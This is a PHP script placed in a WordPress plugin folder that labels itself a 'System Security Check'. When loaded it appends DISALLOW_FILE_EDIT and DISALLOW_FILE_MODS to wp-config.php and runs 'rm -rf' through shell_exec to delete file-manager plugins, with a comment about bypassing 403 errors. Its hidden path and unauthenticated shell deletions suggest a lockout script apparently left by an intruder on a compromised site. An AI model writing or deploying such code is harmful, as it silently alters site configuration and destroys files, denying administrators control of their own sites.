File: /var/www/html/wp-content/plugins/yteam/m/wp.php
<?php
echo "<h3>đ ī¸ System Security Check</h3>";
$file = find_config();
if (!$file) exit("â wp-config.php tidak ditemukan!");
echo "đ Target: <code>$file</code><br>";
harden_config($file);
clean_plugins(dirname($file));
function find_config() {
$dir = __DIR__;
while ($dir !== dirname($dir)) {
if (file_exists("$dir/wp-config.php")) return "$dir/wp-config.php";
$dir = dirname($dir);
}
return false;
}
function harden_config($path) {
$data = @file_get_contents($path);
if (!$data) { echo "â Gagal baca file!<br>"; return; }
$rules = ["DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS"];
$count = 0;
foreach ($rules as $r) {
if (strpos($data, $r) === false) {
$data .= "\ndefine('$r', true);";
$count++;
}
}
if ($count > 0) {
$res = @file_put_contents($path, $data);
echo $res ? "â
Hardening: <b>DONE</b> ($count added)<br>" : "â Hardening: <b>FAILED</b> (Permission?)<br>";
} else {
echo "âšī¸ Status: Already Hardened<br>";
}
}
function clean_plugins($root) {
$p_dir = "$root/wp-content/plugins";
$list = ['wp-file-manager', 'wpspy', 'file-manager-advanced'];
foreach ($list as $p) {
$target = "$p_dir/$p";
if (is_dir($target)) {
// Gunakan system delete agar lebih cepat & bypass 403
@shell_exec("rm -rf " . escapeshellarg($target));
echo (is_dir($target)) ? "â Gagal hapus: $p<br>" : "đī¸ Plugin: <b>$p DONE</b><br>";
}
}
}
?>